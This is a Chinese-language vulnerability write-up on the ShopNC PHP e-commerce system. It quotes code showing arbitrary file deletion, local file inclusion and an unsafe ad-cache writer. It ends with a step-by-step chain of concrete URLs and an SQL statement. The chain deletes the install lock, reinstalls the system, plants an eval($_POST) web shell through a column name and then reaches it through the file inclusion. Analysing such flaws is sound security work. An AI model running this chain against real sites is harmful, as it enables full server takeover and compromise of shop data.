前言
ShopNC是一款网城创想公司旗下服务于企业客户的电子商务系统,基于PHP5技术采用MVC 模式开发,本文介绍了shopnc多个漏洞结合,可getshell有点暴力-_-
任意文件删除
文件 control\store.php 1438 行 (还有几个同样的地方,新版已修复)
........
$model_upload = Model('upload');
$file_info = $model_upload->getOneUpload(intval($_GET['file_id']));
if(!$file_info){
@unlink(ATTACH_SLIDE.DS.$_GET['img_src']);
}else{
........
本地文件包含
文件 /framework/core/base.php 71行
$act_file = realpath( BasePath.DS."control".DS.$_GET['act'].".php" );
}
if ( is_file( $act_file ) )
{
require( $act_file );
$class_name = $_GET['act']."Control";
if ( class_exists( $class_name ) )
后台更新缓存写shell
/**
* 更新一条广告缓存
*
* @param unknown_type $adv
* @return unknown
*/
public function makeAdvCache($adv){
$lang = Language::getLangContent();
$tmp .= "<?php \r\n";
$tmp .= "defined('InShopNC') or exit('Access Invalid!'); \r\n";
if (is_numeric($adv) && $adv > 0){
$condition['adv_id'] = $adv;
$adv_info = $this->getList($condition);
$adv = $adv_info['0'];
}
..................................
$content = addslashes($v);
$content = str_replace('$','\$',$content);
//防止有$符号被解析成变量
$tmp .= '$'.$k." = \"".$content."\"; \r\n";
}
//缓存文件存放位置及文件名
$cache_file = BasePath.'/cache/adv/adv_'.$adv['adv_id'].'.cache.php';
file_put_contents($cache_file,$tmp);
继续跟进getList函数
public function getList($condition=array(), $page='', $limit='', $orderby=''){
$param = array();
$param['table'] = 'adv';
$param['field'] = $condition['field']?$condition['field']:'*';
$param['where'] = $this->getCondition($condition);
if($orderby == ''){
$param['order'] = 'slide_sort, adv_id desc';
}else{
$param['order'] = $orderby;
}
$param['limit'] = $limit;
return Db::select($param,$page);
}
写文件时,从数据库中遍历key,跟value 未过滤key,key 可以从数据库读取,当有数据库可控时,即可写入任意文件.
ShopNc GetShell
结合以上三个漏洞,即可优雅的 getshell
流程
任意文件删除 => 重装 => 更改数据库 shopnc_adv 键值 =>更新广告缓存 =>getshell
具体步骤
1:http://www.xxx.com/index.php?act=store&op=dorp_img&file_id=16&img_src=/../../../install/lock
2:重装系统
3:进入MySQL 执行sql ALTER TABLE `shopnc_adv` ADD `{eval($_POST[1])}` VARCHAR( 100 ) NOT NULL
4:进入后台 更新广告缓存 http://www.xxx.com/admin/index.php?act=adv&op=adv_edit&adv_id=14
5:连接shell http://www.xxx.com/index.php?act=../cache/adv/adv_14.cache